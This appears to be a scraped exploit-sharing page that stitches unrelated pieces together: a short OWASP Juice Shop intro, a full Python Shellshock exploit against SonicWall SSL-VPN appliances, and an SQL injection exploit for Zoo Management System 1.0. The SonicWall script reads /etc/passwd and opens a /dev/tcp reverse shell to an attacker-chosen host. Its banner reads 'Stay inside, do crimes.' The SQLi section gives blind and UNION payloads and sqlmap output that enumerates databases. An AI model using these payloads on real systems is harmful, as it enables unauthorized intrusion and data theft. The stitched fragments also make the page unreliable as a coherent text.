As a lifelong newbie, I was confused when I opened OWASP Juice Shop: what on earth is this? I could not make sense of this range at all. Inspecting the page elements, we see the following code.
I spotted a scoreboard page at the link #score-board. We visit this page.
From here, I took my first step toward becoming a big-shot hacker!
HireHackking
# Exploit Title: SonicWall SSL-VPN 8.0.0.0 - 'shellshock/visualdoor' Remote Code Execution (Unauthenticated)
# Exploit Author: Darren Martyn
# Vendor Homepage: https://www.home-assistant.io/
# Version: < SMA 8.0.0.4
# Blog post: https://darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit/

#!/usr/bin/python
# coding: utf-8
# Author: Darren Martyn
# Credit: Phineas Fisher
# Notes:
# This exploit basically implements the exploits Phineas Fisher used to pwn Hacking Team
# and the Cayman Trust Bank place. It uses the Shellshock vulnerability to gain a command
# execution primitive as the "nobody" user in the cgi-bin/jarrewrite.sh web-script, spawns
# a trivial reverse shell using /dev/tcp.
# There is a fairly trivial LPE in these that gets you root by abusing setuid dos2unix, but
# implementing that is left as an exercise for the reader. I've seen a few approaches, and
# would be interested in seeing yours.
# There is another LPE that works only on some models which I also have removed from this.
# Details: https://darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit/
import requests
import sys
import telnetlib
import socket
from threading import Thread
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
import time

def banner():
    # The ASCII-art "visualdoor" logo did not survive extraction; only its text lines are kept.
    print """
    SonicWall SSL-VPN Appliance Remote Exploit
    Public Release (Jan 2021).
    Author: Darren Martyn.
    Credit goes to Phineas Fisher for this.
    Stay inside, do crimes.
    """

def handler(lp):
    # handler borrowed from Stephen Seeley.
    print "(+) starting handler on port %d" %(lp)
    t = telnetlib.Telnet()
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind(("0.0.0.0", lp))
    s.listen(1)
    conn, addr = s.accept()
    print "(+) connection from %s" %(addr[0])
    t.sock = conn
    print "(+) pop thy shell!"
    t.interact()

def execute_command(target, command):
    url = target + "/cgi-bin/jarrewrite.sh"
    headers = {"User-Agent": "() { :; }; echo ; /bin/bash -c '%s'" %(command)}
    r = requests.get(url=url, headers=headers, verify=False)
    return r.text

def check_exploitable(target):
    print "(+) Testing %s for pwnability..." %(target)
    output = execute_command(target=target, command="cat /etc/passwd")
    if "root:" in output:
        print "(*) We can continue, time to wreck this shit."
        return True
    else:
        return False

def pop_reverse_shell(target, cb_host, cb_port):
    print "(+) Sending callback to %s:%s" %(cb_host, cb_port)
    backconnect = "nohup bash -i >& /dev/tcp/%s/%s 0>&1 &" %(cb_host, cb_port)
    execute_command(target=target, command=backconnect)

def hack_the_planet(target, cb_host, cb_port):
    if check_exploitable(target) == True:
        pass
    else:
        sys.exit("(-) Target not exploitable...")
    handlerthr = Thread(target=handler, args=(int(cb_port),))
    handlerthr.start()
    pop_reverse_shell(target=target, cb_host=cb_host, cb_port=cb_port)

def main(args):
    banner()
    if len(args) != 4:
        sys.exit("use: %s https://some-vpn.lol:8090 hacke.rs 1337" %(args[0]))
    hack_the_planet(target=args[1], cb_host=args[2], cb_port=args[3])

if __name__ == "__main__":
    main(args=sys.argv)
HireHackking

Zoo Management System 1.0 - 'anid' SQL Injection

# Exploit Title: Zoo Management System 1.0 - 'anid' SQL Injection
# Google Dork: N/A
# Date: 29/1/2021
# Exploit Author: Zeyad Azima
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/zoo-management-system-using-php-and-mysql/
# Version: V1
# Tested on: Windows

# Identify the vulnerability

1- go to http://localhost/animals.php and click on an animal
2- then add the following payload to the url

payload: anid=9' AND (SELECT 8432 FROM (SELECT(SLEEP(5)))lMym) AND 'jMXh'='jMXh

url: http://localhost/animal-detail.php?anid=1%20anid=9%27%20AND%20(SELECT%208432%20FROM%20(SELECT(SLEEP(5)))lMym)%20AND%20%27jMXh%27=%27jMXh

If the web server makes you wait 5 seconds then it's vulnerable

# Exploit

Now you can exploit it using sqlmap command: sqlmap -u url --dbs

example: sqlmap -u http://localhost/zms/animal-detail.php?anid=1 --dbs

___ __H__ ___ ___[.]_____ ___ ___ {1.4.10.16#dev} |_ -| . [.] | .'| . | |___|_ [)]_|_|_|__,| _| |_|V... |_| http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 23:05:33 /2021-01-29/

[23:05:34] [INFO] resuming back-end DBMS 'mysql'
[23:05:34] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=ban6c541hos...n856fi447q'). Do you want to use those [Y/n] y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: anid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: anid=9' AND 1925=1925 AND 'JrZo'='JrZo

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: anid=9' AND (SELECT 8432 FROM (SELECT(SLEEP(5)))lMym) AND 'jMXh'='jMXh

    Type: UNION query
    Title: Generic UNION query (NULL) - 8 columns
    Payload: anid=9' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x716b6b6271,0x5262686e75537a58716e565153775775796b547a4c56616b42647045536274444c6f6b585a654476,0x716a627171),NULL,NULL,NULL,NULL-- -
---
[23:05:36] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.41, PHP 7.3.10, PHP
back-end DBMS: MySQL >= 5.0.12
[23:05:36] [INFO] fetching database names
available databases [6]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] sys
[*] umspsdb
[*] zmsdb

[23:05:36] [INFO] fetched data logged to text files under